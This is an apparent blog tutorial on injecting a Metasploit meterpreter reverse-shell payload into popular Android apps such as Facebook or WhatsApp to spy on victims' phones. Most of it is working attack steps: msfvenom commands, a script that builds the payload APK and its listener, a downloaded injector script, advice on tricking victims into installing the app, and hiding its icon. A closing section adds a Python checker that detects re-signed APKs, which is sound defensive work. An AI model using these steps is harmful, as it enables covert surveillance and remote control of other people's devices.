How to inject malicious payloads into Android applications

Do you have a smartphone? Do you use apps? Well, you are under attack. This tutorial walks through how easy it is to inject malicious payloads into well-established applications and use them to spy on remote devices. It accompanies the talk I gave at the Colombo Security Meetup.

Disclaimer: This is strictly for educational purposes only. I cannot and will not be responsible for any damage caused by using any of these methods.

Skip ahead if you want to get to the tutorial instead of the writeup.

Can mobile phones be hacked?

Mobile phones have many capabilities: sending SMS, taking calls, taking photos and videos, and recording audio. The device OS exposes most of these to applications as APIs. The malicious payload used here calls those same APIs and ships the results to a remote intruder over a reverse shell. This is no different from writing a custom application that collects these details from the phone; the difference is that the payload is already written and includes a reverse shell you can connect back to at any time.

The technique illustrated here applies only to Android phones. It uses the standard device APIs to reach the functionality the phone exposes, so no OS vulnerability is involved: it requires the attacker to get a malicious version of an application installed on the target phone.

Requirements

  • Android phone
  • A machine the phone can reach (a public IP address, or the same LAN for a test like the one below) with Metasploit installed, natively or via Docker.

I will be using Metasploit via Docker.

Find a target application

This is the application you will inject the malicious payload into. Any application will do, but a good target is one like Facebook or Instagram: the original already asks for permissions such as camera access, so the injected version looks legitimate from the victim's point of view because it requests nothing extra. You can download apps from APKMirror, APKPure.com or elsewhere. The following steps assume the APK has been downloaded and is available as /tmp/test/authentic.apk, the directory that will be mounted into the container.

Generate payload application

The following command mounts the host directory /tmp/test into the container at the same path, then uses msfvenom to generate the meterpreter payload as an Android application with the given LHOST and LPORT.

docker run \
--rm \
-v /tmp/test:/tmp/test \
-it metasploitframework/metasploit-framework \
./msfvenom \
-p android/meterpreter/reverse_tcp \
LHOST=192.168.8.103 \
LPORT=5555 \
-o /tmp/test/exploited.apk

Replace LHOST with the IP address of the machine that will run the handler and LPORT with the port the handler listens on.

This generates a bare application whose only job is the meterpreter reverse shell, which gives access to all the functionality we need. There are other Android payloads as well; msfvenom -l payloads lists them.
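The post never shows the listener side that the payload calls back to. The following is an added example, not code from the original post: it validates LHOST and LPORT before they are baked into the APK, wraps the same docker msfvenom invocation, sanity-checks the output file, and writes the multi/handler resource file for msfconsole. The file names, the 0.0.0.0 bind address and the handler options are this example's own choices.

```shell
#!/bin/sh
# Added example (not from the original post): generate the payload APK with the
# metasploitframework/metasploit-framework image and write a matching handler.rc.
set -eu

validate_lhost() {               # dotted-quad IPv4 only; a typo here means no callback
    echo "$1" | grep -Eq '^([0-9]{1,3}\.){3}[0-9]{1,3}$' || return 1
    for octet in $(echo "$1" | tr '.' ' '); do
        [ "$octet" -le 255 ] || return 1
    done
}

validate_lport() {               # 1-65535
    echo "$1" | grep -Eq '^[0-9]{1,5}$' && [ "$1" -ge 1 ] && [ "$1" -le 65535 ]
}

# The handler binds 0.0.0.0 so it listens on every interface of the listener box;
# the APK itself carries the address the phone must reach (LHOST below).
write_handler_rc() {             # $1=lport  $2=path of the .rc file to write
    cat > "$2" <<EOF
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT $1
set ExitOnSession false
exploit -j -z
EOF
}

# An APK is a zip, so the cheapest sanity check on msfvenom's output is the
# "PK" magic at offset 0: an empty file or captured error text fails this.
looks_like_apk() {               # $1=path
    [ -s "$1" ] && [ "$(head -c 2 "$1")" = "PK" ]
}

generate_apk() {                 # $1=lhost $2=lport $3=host dir $4=apk file name
    validate_lhost "$1" || { echo "bad LHOST: $1" >&2; return 1; }
    validate_lport "$2" || { echo "bad LPORT: $2" >&2; return 1; }
    docker run --rm -v "$3:$3" metasploitframework/metasploit-framework \
        ./msfvenom -p android/meterpreter/reverse_tcp \
        LHOST="$1" LPORT="$2" -o "$3/$4"
    looks_like_apk "$3/$4"
    write_handler_rc "$2" "$3/handler.rc"
}
```

Usage: source the file and run generate_apk 192.168.8.103 5555 /tmp/test exploited.apk. Then start the listener with msfconsole -q -r /tmp/test/handler.rc; if the handler runs from the same Docker image, publish the port as well (docker run --rm -v /tmp/test:/tmp/test -p 5555:5555 -it metasploitframework/metasploit-framework ./msfconsole -q -r /tmp/test/handler.rc), otherwise the phone cannot reach it.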

Inject into another application

If you distribute this app as is, it will almost always be detected and the install blocked. What you need is another application that users already use, with this payload injected into it. A well-used application such as Facebook or WhatsApp can serve as the container. On the target phone it provides the full functionality of the container application and, under the hood, also starts the meterpreter.

If you have Metasploit installed on your local machine, msfvenom can do the injection itself: -x takes the original APK as a template and rebuilds it with the payload inside.

msfvenom \
-p android/meterpreter/reverse_tcp \
LHOST=192.168.8.103 \
LPORT=5555 \
-o /tmp/test/exploited.apk \
-x /tmp/test/authentic.apk

If you are using the Docker image this will fail, because msfvenom shells out to apktool and the JDK's keytool and jarsigner to rebuild and re-sign the template, and the image does not include them. Use the following method instead.

Injecting the payload with the apkinjector script takes a few steps.

  1. Download the shell script (note the capital -O, which writes the download to the given file; a lowercase -o would only send wget's log there):

wget https://raw.githubusercontent.com/udnisap/apkinjector/master/apkinjector -O /tmp/test/apkinjector

  2. Run a container with Java:

# Docker with openjdk
docker run \
-v /tmp/test:/tmp/test \
--rm \
-it openjdk bash

  3. Inject the payload into the target application (payload APK first, original APK second):

cd /tmp/test
chmod +x ./apkinjector
./apkinjector ./exploited.apk ./authentic.apk

  4. The script may show a few prompts; once it finishes, injected_authentic.apk will be available on the host machine at /tmp/test/injected_authentic.apk.

Distribute Malicious application

There are a number of ways to get this app onto the victim's phone. If you manage to get hold of the phone you can simply install it. A typical social-engineering pattern is to claim to provide additional functionality or an unlocked feature that is not available in the normal app store version. Since some applications are not available in some regions, that can also be a selling point.

Once the app is installed, you can use the reverse shell to hide the application from the launcher (the Android meterpreter's hide_app_icon command); it then shows up only if the user goes through the list of installed apps in Settings.

Are you a victim?

There is no easy way to confirm that every application on your phone is legitimate. What you can do is uninstall all the applications and reinstall them from the app store. Things worth checking before that: an app that was sideloaded rather than installed from the store, permissions the official version does not ask for, and a signing certificate that differs from the developer's, since a repackaged APK has to be re-signed with the attacker's key.
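An added example of the signing-certificate check, not code from the original post: it pulls the v1 (JAR) signer certificates out of an APK's META-INF/*.RSA PKCS#7 blob with a minimal DER walker and compares their SHA-256 fingerprints with a known-good set. The sample APKs, the placeholder certificates and the fingerprints are constructed inline so it runs offline; no real X.509 certificate or signature is produced. APKs signed only with the v2/v3 scheme carry no META-INF signature files, so for those use apksigner verify --print-certs instead.

```python
"""Added example (not from the original post): spot a re-signed APK.

Repackaging tools (msfvenom -x, apkinjector) rebuild the APK and must re-sign
it with the attacker's key, so the signing certificate no longer matches the
developer's. This reads the v1 (JAR) signature under META-INF/ with a minimal
DER walker; v2/v3-only APKs need `apksigner verify --print-certs` instead.
"""
import hashlib
import io
import zipfile

OID_SIGNED_DATA = bytes.fromhex("2a864886f70d010702")  # 1.2.840.113549.1.7.2
OID_PKCS7_DATA = bytes.fromhex("2a864886f70d010701")   # 1.2.840.113549.1.7.1


def der_iter(buf):
    """Yield (tag, value, raw_tlv) for each top-level DER TLV in buf."""
    pos = 0
    while pos < len(buf):
        start = pos
        tag, length = buf[pos], buf[pos + 1]
        pos += 2
        if length & 0x80:                       # long-form length
            n = length & 0x7F
            length = int.from_bytes(buf[pos:pos + n], "big")
            pos += n
        value = buf[pos:pos + length]
        pos += length
        yield tag, value, buf[start:pos]


def der_encode(tag, payload):
    """Minimal DER TLV encoder; only used to build the constructed fixture."""
    n = len(payload)
    if n < 0x80:
        return bytes([tag, n]) + payload
    lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(lb)]) + lb + payload


def certificates_from_pkcs7(blob):
    """Raw DER certificates carried in a PKCS#7 SignedData (META-INF/CERT.RSA)."""
    _, content_info, _ = next(der_iter(blob))                 # ContentInfo SEQUENCE
    (oid_tag, oid, _), (ctx_tag, explicit0, _) = list(der_iter(content_info))[:2]
    if oid_tag != 0x06 or oid != OID_SIGNED_DATA or ctx_tag != 0xA0:
        raise ValueError("not a PKCS#7 SignedData")
    _, signed_data, _ = next(der_iter(explicit0))             # SignedData SEQUENCE
    certs = []
    for tag, value, _ in der_iter(signed_data):
        if tag == 0xA0:                                       # [0] IMPLICIT certificates
            certs += [raw for t, _v, raw in der_iter(value) if t == 0x30]
    return certs


def apk_signer_fingerprints(apk_bytes):
    """SHA-256 of every v1 signer certificate, lowercase hex as apksigner prints it."""
    fps = set()
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as zf:
        for name in zf.namelist():
            if name.startswith("META-INF/") and name.upper().endswith((".RSA", ".DSA", ".EC")):
                for cert in certificates_from_pkcs7(zf.read(name)):
                    fps.add(hashlib.sha256(cert).hexdigest())
    return fps


def check_apk(apk_bytes, known_good_fingerprints):
    """'ok' if a known developer cert signed it, 'resigned' if not, 'no-v1-signature' if none."""
    found = apk_signer_fingerprints(apk_bytes)
    if not found:
        return "no-v1-signature"           # v2/v3-only APK: fall back to apksigner
    return "ok" if found & set(known_good_fingerprints) else "resigned"


# ---- constructed fixture: placeholder certs inside unsigned PKCS#7 shells ----
def build_fixture_apk(cert_der):
    """Minimal zip shaped like a v1-signed APK whose CERT.RSA carries cert_der.
    SignerInfos is left empty: the signature is not modelled, only the chain."""
    signed_data = der_encode(0x30, b"".join([
        der_encode(0x02, b"\x01"),                             # version
        der_encode(0x31, b""),                                 # digestAlgorithms
        der_encode(0x30, der_encode(0x06, OID_PKCS7_DATA)),    # encapContentInfo
        der_encode(0xA0, cert_der),                            # [0] certificates
        der_encode(0x31, b""),                                 # signerInfos
    ]))
    pkcs7 = der_encode(0x30, der_encode(0x06, OID_SIGNED_DATA) + der_encode(0xA0, signed_data))
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("AndroidManifest.xml", b"<placeholder/>")
        zf.writestr("classes.dex", b"dex\n035\x00placeholder")
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        zf.writestr("META-INF/CERT.SF", "Signature-Version: 1.0\n")
        zf.writestr("META-INF/CERT.RSA", pkcs7)
    return buf.getvalue()


# Placeholder SEQUENCEs standing in for the real X.509 DER certificates.
DEVELOPER_CERT = der_encode(0x30, b"developer-cert-placeholder")
ATTACKER_CERT = der_encode(0x30, b"attacker-cert-placeholder")
KNOWN_GOOD = {hashlib.sha256(DEVELOPER_CERT).hexdigest()}

if __name__ == "__main__":
    print(check_apk(build_fixture_apk(DEVELOPER_CERT), KNOWN_GOOD))   # ok
    print(check_apk(build_fixture_apk(ATTACKER_CERT), KNOWN_GOOD))    # resigned
```

On a real device the APK to check comes from adb shell pm path com.example.app followed by adb pull, and the known-good fingerprint is the one the developer publishes or the one keytool -printcert -jarfile shows for a copy installed from the store. The DER walker deliberately does not validate the certificate or the signature; it only answers the question this section asks, whether the app was signed by the key you expect.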
